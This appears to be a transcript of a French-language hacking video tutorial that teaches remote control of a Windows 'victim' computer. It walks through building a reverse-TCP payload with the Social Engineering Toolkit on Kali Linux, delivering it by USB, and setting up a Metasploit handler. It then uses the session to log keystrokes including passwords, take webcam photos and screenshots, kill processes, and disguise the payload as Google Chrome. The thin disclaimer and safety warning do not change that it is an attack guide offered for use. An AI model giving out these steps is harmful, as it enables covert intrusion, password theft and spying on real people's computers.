Bonjour à tous, ici Shadow Hacker et aujourd'hui je vais vous apprendre comment contrôler un ordinateur à distance. Premièrement, sur l'ordinateur de votre victime, il va falloir que les applications .exe soient autorisées, donc type de fichier exclu, application.exe. Donc on va faire X, on n'a plus besoin de tout ça. Ensuite, ce que vous allez avoir besoin, c'est d'un ordinateur comme interface Kali Linux. C'est un outil d'exploitation qui est assez utile pour hacker des ordinateurs. Donc, premièrement, sur votre ordi Kali Linux, vous allez aller dans Applications, outils d'exploitation, Kali Linux, excusez-moi, outils d'exploitation, Social Engineering Toolkit et SE Toolkit. Donc, ce programme-là, dans le Kali Linux, lui, ce qu'il fait, c'est qu'il va créer un payload ou un listener, en d'autres mots, qui va pouvoir enregistrer tout ce que la victime fait. Donc, premièrement, on va faire le numéro 1, Social Engineering Attacks. Ensuite, on va essayer de créer un payload ou un listener, donc le numéro 4. Notre adresse s'y peut, on va ouvrir un nouveau terminal puis on va y taper la commande ifconfig. Donc ici 192.18.0.106 c'est mon adresse sur mon réseau local. En même temps, je tiens à préciser que j'hack absolument personne pour le moment, puisque je pirate mon ordinateur. Donc c'est pas mal ça. Donc pourquoi j'ai choisi le numéro 2, c'est parce qu'on va hacker un ordinateur Windows. Un ordinateur Windows. Voyons le payload, on va prendre un exécutable, donc le numéro 4. Pour le port, on va laisser le 443. Donc, qui est en train de créer un payload dans le répertoire usr/share/7. Donc, on peut y aller tout de suite. Donc, dans dossier personnel. Ok, ici. Donc, usr. Ici. Share. Et 7. Donc, 7. Puis le payload, on voit qu'il est bien créé. Donc, ce que vous avez à faire, c'est le copier et le coller sur votre clé USB. Donc, moi, je l'ai déjà fait, donc c'est pas utile que je le fasse. Maintenant, il va nous demander si on veut starter le listener maintenant. Donc, oui. Puis, il est en train de ouvrir le listener. Ce que j'ai fait, c'est seulement créer le payload qu'on met sur l'ordinateur de notre victime. Donc, qui est correct, pour être utilisé. Donc, on s'en va sur notre clé USB sur l'ordinateur de notre victime. Puis moi, je l'ai appelé Payload Papa, puisque mes parents, ils n'ont pas la même maison, ils ont été divorcés. Donc, moi, je suis chez mon père en ce moment. Donc, Payload Papa. Donc, on voit ici que le payload a été envoyé à 192.168.0.101, donc l'ordinateur de ma victime. Donc maintenant, ce que vous allez faire, c'est Sessions. Puis on voit qu'il est bien activé sur VenceMic PC. Donc pour être sûr que vous me croyez, on va aller dans panneau de configuration, ordinateur, gestion de l'ordinateur, je sais pas il est où, système, parfait, système. Donc, où est-ce qu'on voit ça? Je crois que... Ah oui, ici, VenceMic PC. Nom de l'ordinateur, VenceMic PC, que l'on peut voir juste ici sur mon ordinateur. On est sur la session VenceGang. Donc, ici, VenceGang. Et voilà. Donc, on est vraiment sur l'ordinateur de ma victime. Donc, maintenant, ce que l'on va faire, c'est on va faire un Sessions -i et le numéro. Donc, on est connecté avec l'ordinateur de ma victime.
on peut vraiment tout faire. Donc pour connaître les commandes, vous y tapez help. Puis il y a toutes les commandes que vous voulez. Ils sont en anglais par exemple. Donc tout ça pour vous dire de faire attention à ce que vous téléchargez, parce que le payload il est vraiment capable de s'incruster, exemple dans des mises à jour Java ou dans n'importe quel fichier système. Donc si vous cliquez sur des annonces bidons, ben, c'est ce qui va vous arriver, vous allez être hacké. Je vais vous montrer quelques commandes. Donc on peut sur l'ordinateur de ma victime, je vais ouvrir un document texte et on va faire un kscan underscore start. Et voilà. Maintenant, on va écrire quelque chose dans le bloc-notes. Donc, on va écrire shadow hacker. Donc, maintenant, on va faire un kscan underscore dump. Donc, on voit que j'ai marqué shadow hacker et que j'ai fait un hash puis que je l'ai enlevé. À quoi sert le kscan? C'est de savoir ce que la victime écrit. Comme si, exemple, il écrit un mot de passe, ben, vous allez pouvoir le savoir. Vous pouvez voir la liste des webcams. Webcam underscore list. Donc on voit que ma victime a une vidéo webcam. Donc on peut faire un webcam underscore snap. Et voilà, on voit ici que j'ai pris une photo. On peut faire vraiment n'importe quoi. On peut voir aussi, la liste des processus. Donc, vous voyez que mon notepad sur l'ordinateur de ma victime est ouvert. Donc, on voit ici que notepad est ouvert. Donc, ce qu'on va faire, c'est un kill qui va carrément fermer le notepad. Donc, on prend le numéro ici, le 4176. Donc, 4176, enter. Et voilà, le notepad est enlevé. Aussi, ce qui est le fun, c'est que voyons, l'icône est changeable par certains programmes. Vous pouvez, exemple, le changer comme Google Chrome si vous avez accès à la victime. Maintenant, je vais vous montrer une autre part du tuto qui est de se connecter au payload sans en créer un deuxième. Donc, tout ce que j'ai fait au début, c'est que j'ai tapé la commande msf console. Maintenant, on va faire un use multi slash handler. Ok. Donc, maintenant, on va faire un set payload Windows slash interpreter slash reverse underscore TCP. Donc le payload est déjà seté, il est dans ma clé, sauf que là j'aurais pu le changer par exemple en Google Chrome ou Internet Explorer. Donc maintenant on va faire un set lhost, puis on va mettre mon adresse IP 192.168.0. que je me souviens déjà plus, if config .106. Maintenant on va faire le set lport qu'on avait laissé au 443 et on va faire un exploit. Donc maintenant ce que l'on va faire, c'est qu'on va activer le payload qui est sur ma clé USB que j'aurais pu changer exemple en Google Chrome. Et voilà, je suis connecté à l'ordinateur de ma victime. On peut faire ce que je vous ai dit, c'est toujours help encore, même si c'est ce type d'exploitable. Pour voir la liste des processus en premier, on va ouvrir ça. Je vais vous montrer que tout est fonctionnel pareil. Donc, on va faire un kscan
underscore start. Puis on va encore marquer shadow hacker, mais avec un espace entre les deux, puis on va marquer abonnez-vous cette fois-là pour vous montrer que c'est pas un montage. Abonnez-vous. Donc on va faire un key scan underscore dump shadow hacker avec un espace abonnez-vous. Tout fonctionne. Puis j'ai oublié de vous montrer quelque chose aussi. On peut prendre des captures de l'écran de notre victime comme un screenshot. Donc si on ouvre le dossier personnel, on a un screenshot ici et il est marqué vraiment shadow hacker, abonnez-vous. On va faire un kill aussi. PS le notepad kill 4376 4376. Plus de notepad. Je vous ai montré cette vidéo justement. Je vous ai montré cette vidéo. C'est juste un abus instructif. Je veux pas être responsable de ce que vous ferez après le visionnage de ma vidéo. Si vous arrive quelque chose en d'autres mots, c'est que si vous dites ah c'est Shadow Hacker qui m'a appris ça, ben je suis désolé, mais moi je pourrais pas vous aider parce que c'était seulement abus instructif. Donc merci d'avoir écouté ma vidéo, j'espère qu'elle vous a été utile. Abonnez-vous à ma chaîne pour d'autres vidéos de hack. À la prochaine vidéo.